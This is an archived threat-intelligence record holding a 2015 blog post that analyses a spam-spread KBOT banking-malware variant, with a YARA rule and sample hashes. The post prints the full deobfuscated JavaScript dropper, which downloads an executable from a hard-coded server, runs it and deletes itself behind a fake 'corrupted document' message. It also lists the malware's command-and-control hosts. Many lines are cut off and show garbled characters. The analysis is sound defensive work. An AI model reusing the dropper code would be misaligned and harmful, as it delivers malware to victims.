{
	"id": "f5b51224-f9fe-4b06-b2ee-bad2322357d2",
	"created_at": "2026-04-06T00:11:16.637635Z",
	"updated_at": "2026-04-10T03:21:45.264945Z",
	"deleted_at": null,
	"sha1_hash": "50f4873a42d73faeb860bf91b60a3957d1c0ccd9",
	"title": "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 49866,
	"plain_text": "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.tx\r\nArchived: 2026-04-05 17:12:20 UTC\r\nNewest addition to a happy family: KBOT\r\n---\r\nAt the beginning of the May here in Poland we have couple of free days. 3rd May is Constitution Day, and May 1\r\nMost of us use those days to unwind after winter, but some malware authors apparently didnât: a few weeks\r\nspreading some poorly obfuscated Javascript and quite an interesting modification of KBOT from the Carberp lea\r\nSpam run.\r\n---\r\nIf you want to stay trendy, you have to follow the trendsetters and the in malware world these days, these app\r\nSince they moved to spreading JavaScriptâs instead of .doc/.docm/.pdf.exe, the rest of the world has foll\r\nThe first payload is a Javascript dropper, and it doesnât do anything except download the second stage in\r\nThe obfuscation used here is interesting but trivial to break.\r\nI came up with this nifty one liner ;]\r\ncat Zamowienie.js | python2 -c 'import re,sys;print re.sub(r\"\\\\u00([a-f0-9]{2})\",lambda x: chr(int(x.group(1)\r\nAnd voila!\r\nvar obj_from = this['ActiveXObject'];\r\nvar obj_thousands7 = this['WScript'];\r\nvar obj_data6 = obj_thousands7['CreateObject']('WScript.Shell');\r\nvar fso12 = new obj_from('Scripting.FileSystemObject');\r\nvar obj_numerous = new obj_from('ADODB.Stream');\r\nvar obj_hundreds2 = new obj_from('Shell.Application');\r\nvar obj_radiofrequency10 = obj_data6['ExpandEnvironmentStrings']('%TEMP%');\r\nvar obj_since = obj_radiofrequency10 + '\\\\' + Math['floor']((Math['random']() * (40 + 10 + 50)) + 1) + '.exe'\r\nvar obj_they = new obj_from('Msxml2.ServerXMLHTTP');\r\nvar obj_find = '\\aflash_update.js';\r\nvar obj_from = obj_hundreds2['NameSpace'](3 + 2 + 2);\r\nvar flagme = false;\r\nvar okidoki = false;\r\nvar tone = 1;\r\nvar obj_including6 = null;\r\nvar obj_trigger = '';\r\nvar obj_practitioners2 = obj_thousands7['ScriptFullNam' + {\r\n Sc3: 'e'\r\n}.Sc3];\r\nvar obj_software = obj_from.Self.Path + obj_find;\r\nvar url12 = 'https://217.28.218.217/AE5600FFCBCC/q64.php?add=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt';\r\nif ((obj_practitioners2 != obj_software) \u0026\u0026 (flagme == false)) {\r\n flagme = true;\r\n fso12['DeleteFile'](obj_practitioners2);\r\nhttps://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt\r\nPage 1 of 4\n\nobj_thousands7['echo']('The document is corrupted and cannot be opened');\r\n obj_thousands7['Sleep'](4000 + 4000);\r\n}\r\nwhile (true) {\r\n tone = tone + 1;\r\n if (tone == 300000000) {\r\n while (true) {\r\n try {\r\n obj_they['setOption'](3, 'MSXML');\r\n obj_they['open']('GET', url12 + '\u0026' + Math['floor']((Math['random']() * (200)) + 1), false);\r\n obj_they['send']();\r\n if (obj_they['status'] == (100 + 100)) {\r\n if (fso12['FileExists'](obj_since)) fso12['DeleteFile'](obj_since);\r\n obj_numerous['Open']();\r\n obj_numerous['Type'] = 1;\r\n obj_numerous['Write'](obj_they['responseBody']);\r\n obj_numerous['Position'] = 0;\r\n obj_numerous['SaveToFile'](obj_since);\r\n obj_numerous['Close']();\r\n obj_including6 = fso12['GetFile'](obj_since)['OpenAsTextStream'](1);\r\n if (fso12['FileExists'](obj_since) \u0026\u0026 obj_including6['ReadLine']()['substring'](0, 2) ==\r\n okidoki = true;\r\n obj_hundreds2['ShellExecute'](obj_since, '', '', 'open', '1');\r\n if (fso12['FileExists'](obj_thousands7['ScriptFullName'))\r\n fso12['DeleteFile'](obj_thousands7['ScriptFullName']);\r\n obj_thousands7['Sleep'](4000);\r\n if (fso12['FileExists'](obj_since)) fso12['DeleteFile'](obj_since);\r\n }\r\n obj_including6['Close']();\r\n }\r\n } catch (e) {}\r\n if (okidoki == true) {\r\n break;\r\n }\r\n obj_thousands7['Sleep'](10000 * 7);\r\n }\r\n break;\r\n }\r\n};\r\nSecond Stage, Malware.\r\n---\r\nAs mentioned above, this a KBOT spin off, and it looks like itâs actively being developed and tested in p\r\nFirst version ate my whole RAM and keeps crashing, rebooting my system.\r\nHowever, it improved recently, and right now after a few iterations is much more stable.\r\nKBOT originally was a very simple user-mode downloader, core of old ursnif/gozi2/isfb is my guess.\r\nThis malware has much more to offer tho.\r\nThings that changed:\r\nhttps://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt\r\nPage 2 of 4\n\n- Tor support, yet no Tor found on machine.\r\n- Removed get parameters in favour of json-encoded post data.\r\n- Much more complicated encryption schema (not fully reversed yet)\r\n- Addition of mongoose http server (why is it there?)\r\n- There are probably more changes, but I did only a preliminary analysis of this malware.\r\nWhat didnât change is how they store configuration data.\r\nOr maybe a just a little bit â they added a big header in front `BASECONFIG......` ;]\r\nAfter that we can find typical FJ-struct,\r\n 00000000 fj_struct struc ; (sizeof=0x14, mappedto_188)\r\n 00000000 id dw ?\r\n 00000002 field_2 dw ?\r\n 00000004 offset dd ?\r\n 00000008 size dd ?\r\n 0000000C crc_tag dd ?\r\n 00000010 flags dd ?\r\n 00000014 fj_struct ends\r\nAnd config with crc_tag == 0xefc75d60 is stored in plain text at the beginning of .reloc section\r\n {\r\n \"BotConfig\":\r\n {\r\n \"ServerPub\":\"44DCF35866EB4992264E809EDD001737C65E28BB4DAB8DC7DA5CFA7F1AA05619\",\r\n \"TaskPeriod\": 600,\r\n \"FailPeriod\": 600,\r\n \"BotCommunity\": \"group_102\",\r\n \"Hosts\":\r\n [\r\n \"mensabuxus.net\",\r\n \"ogrthuvwfdcfri5euwg.com\",\r\n \"ogrthuvfewfdcfri5euwg.com\"\r\n ]\r\n }\r\n }\r\nCurrent version is, 16777472 which I suppose can be transformed to 1.00.01.00 so its brand new ;]\r\nFrom other notes, it looks like itâs protected by Rovnix, there is some code to accessing hidden partitio\r\nbut it can be just leftovers from original KBOT source code, since I didnât see any Rovnix related code.\r\nOh and this the first malware I have seen implementing proper hmac for messages, bravo!\r\nThis is just a heads-up article to inform you that there is a new interesting threat. Iâm still working o\r\nOne last thing as a side note, it is quite interesting to see that ISFB, the most spread banker in .pl is bein\r\nIâm very curious to see which one will win the market đ;]\r\nHere are some hashes and yara rule for the unpacked sample\r\nhttps://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt\r\nPage 3 of 4\n\nrule kbot : banker\r\n{\r\n meta:\r\n author = \"mak\"\r\n module = \"kbot\"\r\nstrings:\r\n $bot_cfg = \"BASECONFIG......FJ\"\r\n $injini = \"INJECTS.INI\"\r\n $kbotini = \"KBOT.INI\"\r\n $bot0 = \"BotConfig\"\r\n $bot1 = \"BotCommunity\"\r\n $push_version = { 5? 68 [4] 68 [4] 5? E8 [4] 83 C4 10 85 C0 0F}\r\ncondition:\r\n all of them\r\n}\r\n62962da720d478bb3510dabc691db37df546749b440caa45d75d9fbfb69d82f9\r\n6e6ef05382010f857ecef17082e9c38b54133380f709b5b25e77afdcacf2b9ca\r\n12769a17f85a4c7d56cfe5754184db976b9a361dc7b5d2a8f50e82d7442651aa\r\n5eccbdae80a1c1e8cb8574986393fc958394b66978ec348d00afe3ec828d20ac\r\nSource: https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt\r\nhttps://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt"
	],
	"report_names": [
		"newest_addition_to_happy_family_kbot.17.05.2015.txt"
	],
	"threat_actors": [],
	"ts_created_at": 1775434276,
	"ts_updated_at": 1775791305,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/50f4873a42d73faeb860bf91b60a3957d1c0ccd9.pdf",
		"text": "https://archive.orkl.eu/50f4873a42d73faeb860bf91b60a3957d1c0ccd9.txt",
		"img": "https://archive.orkl.eu/50f4873a42d73faeb860bf91b60a3957d1c0ccd9.jpg"
	}
}